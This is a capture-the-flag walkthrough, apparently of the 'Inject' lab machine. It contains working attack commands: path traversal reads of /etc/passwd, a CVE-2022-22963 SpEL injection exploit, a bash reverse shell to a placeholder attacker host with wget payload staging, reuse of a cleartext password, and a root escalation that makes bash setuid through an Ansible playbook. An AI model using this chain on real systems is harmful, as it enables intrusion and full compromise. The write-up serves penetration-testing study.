Scanning

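> TARGET=10.129.36.96
# Pass 1: fast sweep of all 65535 TCP ports. Keep only the lines nmap reports as "open"
# (the original grep also matched closed/filtered lines and used an unquoted glob), and
# join the port numbers with commas for the -p list.
> PORTS=$(nmap -p- --min-rate=1000 -T4 -Pn "$TARGET" | grep -E '^[0-9]+/tcp +open' | cut -d '/' -f 1 | paste -sd ',' -)
# Pass 2: default scripts + version detection only on the discovered ports. Skip the scan
# (instead of running nmap -p "" against the host) when the sweep found nothing.
> [ -n "$PORTS" ] && nmap -p"$PORTS" -sC -sV -Pn -vvv "$TARGET" -oN nmap_tcp_all.nmap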

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enum (port 8080 — nmap's "nagios-nsca" label is a service-fingerprint mismatch; the http-methods/http-title script output shows it is an HTTP server)

  • Try to upload something via http://10.129.36.96:8080/show_image?img=
  • This leads to another endpoint http://10.129.36.96:8080/show_image?img=<file-you-uploaded>
  • The `img` parameter of `/show_image` is vulnerable to path traversal / LFI: the supplied path is appended to the application's uploads directory without sanitisation, giving arbitrary file read with the web application's privileges
# Fuzz the img parameter with an LFI wordlist. --hw 16 hides every response with 16 words
# (presumably the word count of the baseline/error reply), so only differing replies are listed.
> wfuzz -c -z file,/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://10.129.36.96:8080/show_image?img=FUZZ' --hw 16
# Confirm with /etc/passwd. The dots are percent-encoded (%2e%2e), presumably to get past a
# filter on literal "../"; the 500 error shown further down echoes the path already decoded to
# "../", so the server decodes before resolving. Ten levels are plenty to reach / from the
# uploads directory.
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
  • Enumerate the web-app path: requesting a file that does not exist returns a Spring 500 error whose message echoes the resolved file URL, leaking the absolute base directory (/var/www/WebApp/src/main/uploads) — the real webroot is /var/www/WebApp, not /var/www/html
# Deliberately request a path that does not exist: the Spring error body (below) includes the
# resolved "file:" URL, which leaks the absolute uploads directory and confirms the traversal
# prefix is appended to it unsanitised.
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/index.html'          
{"timestamp":"2023-03-12T20:31:50.737+00:00","status":500,"error":"Internal Server Error","message":"URL [file:/var/www/WebApp/src/main/uploads/../../../../../../../../../../var/www/html/index.html] cannot be resolved in the file system for checking its content length","path":"/show_image"}

# /etc/passwd (filtered to the relevant lines): two accounts with a login shell, frank and
# phil -- these are the candidates for the later lateral movement.
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash

# Directory listing also works: pointing img at a directory (note the trailing slash) returns
# its entries, so the whole project tree can be browsed -- this is how pom.xml is found.
> curl 'http://10.129.36.96:8080/show_image?img=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/www/WebApp/'    
.classpath
.DS_Store
.idea
.project
.settings
HELP.md
mvnw
mvnw.cmd
pom.xml
src
target
  • check pom.xml, note org.springframework.cloud
<dependency>
        <groupId>org.springframework.cloud</groupId>
        <artifactId>spring-cloud-function-web</artifactId>
        <version>3.2.2</version>
</dependency>
  • spring-cloud-function-web 3.2.2 is within the range affected by CVE-2022-22963 (SpEL injection through the `spring.cloud.function.routing-expression` header on /functionRouter; fixed in 3.1.7 / 3.2.3) — PoC: https://github.com/me2nuk/CVE-2022-22963

Foothold: CVE-2022-22963

# s.sh file
#!/bin/bash
# Interactive reverse shell to the attacker's listener (e.g. nc -lvnp 4444).
# Replace <attacker> with the listening host before staging the file.
# /dev/tcp/... is a bash pseudo-device, so this must run under bash, not sh.
# stdout and stderr go to the socket; stdin is then duplicated from it.
bash -i > /dev/tcp/<attacker>/4444 2>&1 0>&1

# CVE-2022-22963: Spring Cloud Function evaluates the spring.cloud.function.routing-expression
# header as SpEL, so T(java.lang.Runtime).getRuntime().exec(...) runs a command as the
# application user. Runtime.exec() splits on whitespace and does NOT go through a shell, so
# redirections/pipes cannot be used inline -- hence stage the script first, then run it.
# Step 1: stage the reverse shell; serve s.sh from <attacker> (e.g. python3 -m http.server 80).
> curl 'http://10.129.36.96:8080/functionRouter' -X POST -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://<attacker>/s.sh -O /tmp/s.sh")' --data-raw 'data' -v
# NOTE(review): the HTTP status is not a reliable success signal for this payload -- confirm
# the fetch in your web-server log and the callback on the listener instead.
# Step 2: execute the staged script; have the listener (nc -lvnp 4444) running first.
> curl 'http://10.129.36.96:8080/functionRouter' -X POST -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/s.sh")' --data-raw 'data' -v

PE: phil

  • Upload and run linpeas from the reverse shell (which runs as frank, the web-app user)
[+] Searching root files in home dirs (limit 30)
/home/
/home/phil/.bash_history
/home/frank/.bash_history
/home/frank/.m2/settings.xml
/root/
  • Found phil's credential: frank's Maven configuration (~/.m2/settings.xml) stores the password for the "Inject" server entry in cleartext, readable from the frank shell
frank@inject:~$ cat /home/frank/.m2/settings.xml
cat /home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>
  • su to phil
frank@inject:~$ su phil
su phil
Password: DocPhillovestoInject123
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
bash -i
bash: cannot set terminal process group (817): Inappropriate ioctl for device
bash: no job control in this shell
phil@inject:/home/frank$ cd
cd
phil@inject:~$ ls
ls
user.txt
phil@inject:~$ cat user.txt
cat user.txt
4f6415fec7f2b19cadf30c0a76365370

PE: root

  • Run linpeas as phil: /opt/automation/tasks/playbook_1.yml shows up among recently modified files, which suggests something (presumably a privileged scheduled job) is re-running Ansible playbooks from that directory
[+] Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_frank/817
/opt/automation/tasks/playbook_1.yml
/var/log/syslog
/var/log/journal/85d739f40e3d4536ad871c536347b52b/user-1001.journal
/var/log/journal/85d739f40e3d4536ad871c536347b52b/system.journal
/var/log/auth.log
/home/phil/.gnupg/pubring.kbx
/home/phil/.gnupg/crls.d/DIR.txt
/home/phil/.gnupg/trustdb.gpg
# mmm.yml -- dropped into /opt/automation/tasks so whatever re-runs the playbooks in that
# directory executes it. /usr/bin/bash ends up setuid/setgid root afterwards, so the runner
# evidently executes as root.
- name: "mmm"
  hosts: localhost        # run on the target itself, no inventory needed
  connection: local       # ... and without SSH
  tasks:
    - name: "mmm"
      shell: "chmod +s /bin/bash"   # setuid+setgid root on bash -> `bash -p` keeps euid 0
      register: "output"            # captured but never used; harmless
# Cleanup: a setuid bash is a loud, persistent backdoor -- `chmod -s /bin/bash` and remove
# this playbook from /opt/automation/tasks once root access is no longer needed.
  • Upload the playbook to /opt/automation/tasks on the target, then wait for the scheduled run to execute it (the setuid bit on /usr/bin/bash afterwards confirms it ran as root)
phil@inject:~$ wget http://<ip>/mmm.yml -O /opt/automation/tasks/mmm.yml
--2023-03-12 21:58:08--  http://<ip>/mmm.yml
Connecting to <ip>:80... connected.
HTTP request sent, awaiting response... 200 OK

phil@inject:~$ ls -ls /usr/bin/bash
1156 -rwsr-sr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash

phil@inject:~$ /usr/bin/bash -p
id
uid=1001(phil) gid=1001(phil) euid=0(root) egid=0(root) groups=0(root),50(staff),1001(phil)

cat /root/root.txt
0fcd38b750f447d389e330edc4e2595a